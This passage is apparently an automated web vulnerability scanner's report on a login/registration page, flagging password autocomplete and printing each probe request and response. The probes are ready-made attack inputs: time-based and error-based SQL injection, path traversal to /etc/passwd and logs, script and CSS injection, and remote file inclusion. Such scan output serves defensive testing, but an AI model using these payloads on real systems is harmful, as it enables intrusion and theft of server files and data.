GET /hmc/report/?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.108. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.109. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.110. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/fd/2 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.111. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../../etc/passwd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.112. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%22%3E%3Cnet%20sparker=netsparker(0x000029)%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%22%3e%3cnet%20sparker=netsparker(0x000029)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.113. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=SELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.114. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=SELECT%20SLEEP(25)--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.115. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../boot.ini%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.116. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000003)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000003)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.117. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../var/log/apache2/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache2/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.118. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.119. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.120. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.121. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=http://netsparker.com/n? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.122. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=body%7Bx:expression(netsparker(0x00004C))%7D HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x00004C))%7D" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.123. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=//netsparker.com/n/n.css?0x00001D HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x00001d" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.124. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.125. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

